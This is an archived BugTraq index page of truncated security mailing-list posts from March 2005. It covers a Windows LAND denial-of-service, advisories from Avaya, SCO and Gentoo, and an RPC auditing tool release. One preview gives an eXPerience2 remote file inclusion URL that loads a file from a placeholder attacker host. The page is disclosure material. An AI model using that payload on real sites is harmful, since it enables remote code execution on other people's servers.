BugTraq Mode:
(Page 1365 of 1748)  < Prev  1360 1361 1362 1363 1364 1365 1366 1367 1368 1369 1370  Next >
Re: Windows Server 2003 and XP SP2 LAND attack vulnerability 2005-03-08
Espen Grøndahl (espen groendahl siemens com)
In-Reply-To: <20050307215532.GA24251 (at) logos.microshaft (dot) org [email concealed]>

Hello

I've been able to reproduce this.

I used ipmagic on debian 3.0 and sendt a packet to a fully patched Windows 2003 server running on Vmware ESX server. I got a 1-5 sec. 100% load on the CPU on the target server. 1 packet/pr. sec. was

[ more ]  [ reply ]
Re: Windows Server 2003 and XP SP2 LAND attack vulnerability 2005-03-08
paul14075 adelphia net
In-Reply-To: <20050307215532.GA24251 (at) logos.microshaft (dot) org [email concealed]>

I can confirm a 15-30 second DoS condition (per packet) on Windows XP Professional SP2 (100% up2date with all Microsoft patches). I tested port 139 which was open and unfirewalled.

I found that the IP and TCP header checksums *do* need

[ more ]  [ reply ]
[SCAN Associates Security Advisory] xoops 2.0.9.2 and below weak file extension validation 2005-03-08
pokley (pokleyzz scan-associates net)
Summary: xoops 2.0.9.2 and below weak file extension validation

Description
===========
XOOPS is an extensible, OO (Object Oriented), easy to use dynamic web
content management system written in PHP. XOOPS is the ideal tool for
developing small to large dynamic community websites, intra company

[ more ]  [ reply ]
RE: Avaya IP Office Phone Manager - Sensitive Information Cleartext Vulnerability 2005-03-08
Walton, John Michael (John) (jmwalton avaya com)
Avaya has finished our investigation of this issue and an Avaya Security
Advisory, ASA-2005-041, has been released. The advisory can be obtained
from:

http://support.avaya.com/security

or directly from:

http://support.avaya.com/elmodocs2/security/ASA-2005-041_Sensitive_Info_

Leak.pdf

We expe

[ more ]  [ reply ]
PE Multiple Remote Access Validation Vulnerabilities (Participate Systems Inc. / Outstart Inc.) 2005-03-08
Altrus Wollesen (root honour ca)


--------------------------------------------------------
- Multiple Remote Access Validation Vulnerabilities
- With PE (community software)
--------------------------------------------------------
(Altrus::security.honour.ca)

Program name: PE

Versions affected: <unknown>

Vendor(s): Outstart

[ more ]  [ reply ]
Multiples Vulnerabilities 2005-03-07
Francisco Alisson (dominusvis click21 com br)


Multiples Vulnerabilities

Product: eXPerience2

I. Remote File Inclusion
http://www.host-vulnerable.com/eXPerience2/modules.php?file=http://evil-
file/

II. Full Path Disclosure
http://www.host-vulnerable.com/eXPerience2/modules.php

Thank you very match :D

[ Infektion Group ]
irc.gig

[ more ]  [ reply ]
Re: Gene6 FTP Server Local Privilege Escalation Vulnerability 2005-03-08
Matthieu (gene6 gene6 com)
In-Reply-To: <5ed07f7a05030708092d774ef8 (at) mail.gmail (dot) com [email concealed]>

>(4) Vendor Reply
>
>Reply from the support (at) G6FtpServer (dot) com [email concealed]
[..]

Here is a copy of our first reply with the solution :

- create a new administrator account
- in Administration / Properties, uncheck Options / Allow all access to localhost.

[ more ]  [ reply ]
iDEFENSE Labs Releases IDA RPC Enumerator 2005-03-07
iDEFENSE Labs (labs-no-reply idefense com)
Developed by Pedram Amini, IDA RPC Enumerator has been released as open
source and is available for download from:

http://labs.idefense.com

IDA RPC Enumerator is an RPC auditing utility written in the IDA Pro
Scripting language, IDC. The script was written to automate the process
of locati

[ more ]  [ reply ]
RE: thoughts and a possible solution on homograph attacks 2005-03-07
Scovetta, Michael V (Michael Scovetta ca com)
Michael,
A few comments. First, in response to:

>I propose to present the user with a dialog showing the text to be
>validated and an input field, into which the user has to type in the
given >text again. The user is told, if both texts match precisely and
what this >means: If the typed text's in

[ more ]  [ reply ]
UnixWare 7.1.4 : squid updated package fixes several security issues 2005-03-07
please_reply_to_security sco com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

________________________________________________________________________
______

SCO Security Advisory

Subject: UnixWare 7.1.4 : squid updated package fixes several security issues
Advisory number: SCOSA-2005.16
Issue date: 2005 February 11
Cr

[ more ]  [ reply ]
Hosting Controller Multiple Unauthenticated information disclose 2005-03-07
small mouse (small mouse gmail com)
-= Security Advisory =-

Advisory Information
-------------------------

Software Package : Hosting Controller
Vendor Homepage : http://www.hostingcontroller.com
Platforms : Windows based servers
Vulnerability : Multiple Unauthenticated informati

[ more ]  [ reply ]
UnixWare 7.1.4 : Samba multiple security issues 2005-03-07
please_reply_to_security sco com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

________________________________________________________________________
______

SCO Security Advisory

Subject: UnixWare 7.1.4 : Samba multiple security issues
Advisory number: SCOSA-2005.17
Issue date: 2005 February 11
Cross reference: sr8924

[ more ]  [ reply ]
Re: [ GLSA 200503-12 ] Hashcash: Format string vulnerability 2005-03-07
Hubert Chan (hubert uhoreg ca)
>>>>> "Thierry" == Thierry Carrez <koon (at) gentoo (dot) org [email concealed]> writes:

[...]

Thierry> Affected packages
Thierry> =================

Thierry> -------------------------------------------------------------------
Thierry> Package / Vulnerable / Unaffected
Thierry> ---

[ more ]  [ reply ]
(Page 1365 of 1748)  < Prev  1360 1361 1362 1363 1364 1365 1366 1367 1368 1369 1370  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus